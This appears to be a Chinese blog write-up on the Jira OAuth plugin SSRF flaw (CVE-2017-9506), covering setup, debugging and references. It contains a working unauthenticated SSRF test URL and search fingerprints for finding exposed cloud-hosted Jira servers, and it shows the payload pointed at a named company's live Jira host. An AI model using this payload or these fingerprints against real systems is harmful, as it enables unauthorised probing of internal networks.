Atlassian OAuth plugin SSRF(CVE-2017-9506)

220 篇文章 7 订阅
213 篇文章 3 订阅

受影响版本:
Jira < 7.3.5

jira安装参考:https://blog.csdn.net/caiqiiqi/article/details/89017806
安装jira-6.4.14版本:
https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-6.4.14.tar.gz
漏洞点:Atlassian OAuth plugin
漏洞测试方法:不需要登录的情况下,访问

https://%basepath%/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl

参考:http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
在这里插入图片描述

调试

根据文章中的描述,漏洞点在:IconUriServlet。
从jar包中找字符串:

grep -irn "iconuri" `find .|grep .jar`

也可以定位到./atlassian-jira/WEB-INF/atlassian-bundled-plugins/atlassian-oauth-service-provider-plugin-1.9.8.jar
atlassian-jira-6.4.14-standalone/atlassian-jira/WEB-INF/atlassian-bundled-plugins/atlassian-oauth-service-provider-plugin-1.9.8.jar!/com/atlassian/oauth/serviceprovider/internal/servlet/user/IconUriServlet.classdoGet()方法下断点。

在这里插入图片描述

9月7日更新:
参考:
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739
https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a
https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326
jira的特征:

X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com"  -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google"  -- For Google

一些SSRF的例子:
https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
在这里插入图片描述

参考

  • https://jira.atlassian.com/browse/JRASERVER-65862
  • https://jira.atlassian.com/browse/CONFSERVER-53362
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值